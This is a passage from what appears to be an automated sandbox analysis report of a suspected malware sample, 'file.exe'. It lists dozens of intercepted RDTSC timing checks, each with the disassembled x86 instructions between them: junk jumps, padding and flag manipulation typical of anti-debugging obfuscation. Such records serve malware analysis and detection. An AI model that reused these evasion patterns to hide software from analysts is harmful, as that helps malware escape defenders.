0x00000073 push edx 0x00000074 jmp 00007F99D0DE6F39h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55404E4 second address: 55404F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520460 second address: 5520464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520464 second address: 5520477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520477 second address: 552048F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552048F second address: 55204B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F99D0D12E24h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55204B0 second address: 55204EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 47B4h 0x00000007 push edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov dl, 3Eh 0x00000012 pushfd 0x00000013 jmp 00007F99D0DE6F2Eh 0x00000018 adc ecx, 55F2A568h 0x0000001e jmp 00007F99D0DE6F2Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55204EC second address: 5520507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520507 second address: 552051F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530F30 second address: 5530F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530F34 second address: 5530FAB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0DE6F30h 0x00000008 adc ax, 1118h 0x0000000d jmp 00007F99D0DE6F2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F99D0DE6F38h 0x0000001b sbb cx, FB78h 0x00000020 jmp 00007F99D0DE6F2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov ax, DACBh 0x0000002e mov ebx, eax 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F99D0DE6F39h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556073F second address: 5560745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560745 second address: 5560749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560749 second address: 556076C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99D0D12E26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556076C second address: 5560772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560772 second address: 55607CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushfd 0x00000010 jmp 00007F99D0D12E1Ah 0x00000015 sbb eax, 79F146A8h 0x0000001b jmp 00007F99D0D12E1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [774365FCh] 0x00000027 jmp 00007F99D0D12E26h 0x0000002c test eax, eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 movsx edx, ax 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55607CD second address: 55607D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55607D2 second address: 5560819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9A42B65F91h 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 call 00007F99D0D12E29h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov ecx, eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov ecx, edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560819 second address: 5560844 instructions: 0x00000000 rdtsc 0x00000002 mov dl, 98h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, CAh 0x00000008 popad 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F99D0DE6F36h 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560844 second address: 556084A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556084A second address: 5560850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560904 second address: 556094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 17B2h 0x00000007 mov al, bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99D0D12E20h 0x00000014 and eax, 2BD280C8h 0x0000001a jmp 00007F99D0D12E1Bh 0x0000001f popfd 0x00000020 mov ax, 663Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F99D0D12E21h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556094F second address: 5560954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5560954 second address: 556098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F99D0D12E1Dh 0x0000000a add al, FFFFFF96h 0x0000000d jmp 00007F99D0D12E21h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99D0D12E1Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 556098E second address: 55609C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F37h 0x00000009 xor cl, 0000007Eh 0x0000000c jmp 00007F99D0DE6F39h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551002F second address: 5510047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510047 second address: 551004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551004B second address: 551005A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551005A second address: 55100D4 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 38830BE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 1170FE94h 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007F99D0DE6F33h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a movzx ecx, di 0x0000001d mov bh, 56h 0x0000001f popad 0x00000020 and esp, FFFFFFF8h 0x00000023 pushad 0x00000024 push ecx 0x00000025 call 00007F99D0DE6F35h 0x0000002a pop esi 0x0000002b pop ebx 0x0000002c mov eax, 00695EFDh 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 jmp 00007F99D0DE6F38h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F99D0DE6F2Eh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55100D4 second address: 55100E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0D12E1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55100E6 second address: 55100EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510224 second address: 551028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0D12E27h 0x00000009 xor si, 3C5Eh 0x0000000e jmp 00007F99D0D12E29h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F99D0D12E1Ah 0x00000021 jmp 00007F99D0D12E25h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551028A second address: 551028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551028E second address: 55102BF instructions: 0x00000000 rdtsc 0x00000002 call 00007F99D0D12E1Ch 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test esi, esi 0x0000000d jmp 00007F99D0D12E21h 0x00000012 je 00007F9A42BB1178h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102BF second address: 55102C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102C5 second address: 55102CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102CB second address: 55102CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55102CF second address: 5510384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F99D0D12E28h 0x00000014 je 00007F9A42BB114Bh 0x0000001a jmp 00007F99D0D12E20h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 jmp 00007F99D0D12E20h 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b jmp 00007F99D0D12E1Eh 0x00000030 pushfd 0x00000031 jmp 00007F99D0D12E22h 0x00000036 sbb esi, 7C283438h 0x0000003c jmp 00007F99D0D12E1Bh 0x00000041 popfd 0x00000042 popad 0x00000043 test edx, 61000000h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007F99D0D12E22h 0x00000052 adc cx, 2E98h 0x00000057 jmp 00007F99D0D12E1Bh 0x0000005c popfd 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510384 second address: 55103A1 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, dx 0x0000000a popad 0x0000000b jne 00007F9A42C8521Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99D0DE6F2Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55103A1 second address: 55103D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F99D0D12E26h 0x00000012 jne 00007F9A42BB10EDh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55103D6 second address: 55103DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55103DC second address: 5510413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0D12E22h 0x00000009 sub ah, FFFFFFB8h 0x0000000c jmp 00007F99D0D12E1Bh 0x00000011 popfd 0x00000012 mov dl, ah 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test bl, 00000007h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, 3383h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510413 second address: 5510419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500830 second address: 5500845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500845 second address: 5500875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov bx, 946Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f mov si, A907h 0x00000013 mov edx, ecx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F99D0DE6F35h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500875 second address: 55008BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, EA73h 0x00000010 mov ah, BAh 0x00000012 popad 0x00000013 and esp, FFFFFFF8h 0x00000016 jmp 00007F99D0D12E1Bh 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F99D0D12E25h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55008BA second address: 55008C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55008C0 second address: 550094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F99D0D12E24h 0x00000010 adc ecx, 7F2A8708h 0x00000016 jmp 00007F99D0D12E1Bh 0x0000001b popfd 0x0000001c mov dl, ah 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F99D0D12E1Bh 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F99D0D12E24h 0x0000002d and ch, FFFFFF98h 0x00000030 jmp 00007F99D0D12E1Bh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007F99D0D12E24h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F99D0D12E1Ah 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550094B second address: 550094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550094F second address: 5500955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500955 second address: 5500985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 movzx ecx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F99D0DE6F2Bh 0x00000013 sub ebx, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99D0DE6F31h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500985 second address: 550098B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550098B second address: 55009A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov ebx, 439227DAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009A0 second address: 55009A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 2ADFh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009A9 second address: 55009E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4EA28656h 0x00000008 jmp 00007F99D0DE6F37h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F9A42C8C8E9h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F99D0DE6F30h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009E5 second address: 55009EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55009EB second address: 5500A41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F99D0DE6F30h 0x00000015 mov ecx, esi 0x00000017 pushad 0x00000018 mov cl, CAh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F99D0DE6F39h 0x00000022 jmp 00007F99D0DE6F2Bh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500A41 second address: 5500AC3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E28h 0x00000008 xor ecx, 2D7DCEC8h 0x0000000e jmp 00007F99D0D12E1Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 je 00007F9A42BB8748h 0x0000001d pushad 0x0000001e jmp 00007F99D0D12E24h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F99D0D12E20h 0x0000002a jmp 00007F99D0D12E25h 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 test byte ptr [77436968h], 00000002h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AC3 second address: 5500AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AC7 second address: 5500ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500ACB second address: 5500AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AD1 second address: 5500AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0D12E27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500AED second address: 5500B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F9A42C8C7E8h 0x0000000d pushad 0x0000000e mov dl, cl 0x00000010 mov dx, ACE2h 0x00000014 popad 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 mov edi, 0DD8F63Ah 0x0000001e call 00007F99D0DE6F2Bh 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F99D0DE6F32h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F99D0DE6F2Dh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500B3D second address: 5500B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500B43 second address: 5500BB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F99D0DE6F30h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F99D0DE6F30h 0x00000015 push eax 0x00000016 jmp 00007F99D0DE6F2Bh 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F99D0DE6F36h 0x00000021 push dword ptr [ebp+14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F99D0DE6F37h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C1C second address: 5500C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C20 second address: 5500C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C26 second address: 5500C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C2C second address: 5500C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C3A second address: 5500C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500C41 second address: 5500CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0DE6F36h 0x00000009 or eax, 7B4C0DA8h 0x0000000f jmp 00007F99D0DE6F2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F99D0DE6F38h 0x0000001b jmp 00007F99D0DE6F35h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov esp, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500CA9 second address: 5500CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99D0D12E1Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500CCE second address: 5500CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500CDD second address: 5500CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C15 second address: 5510C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C1B second address: 5510C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
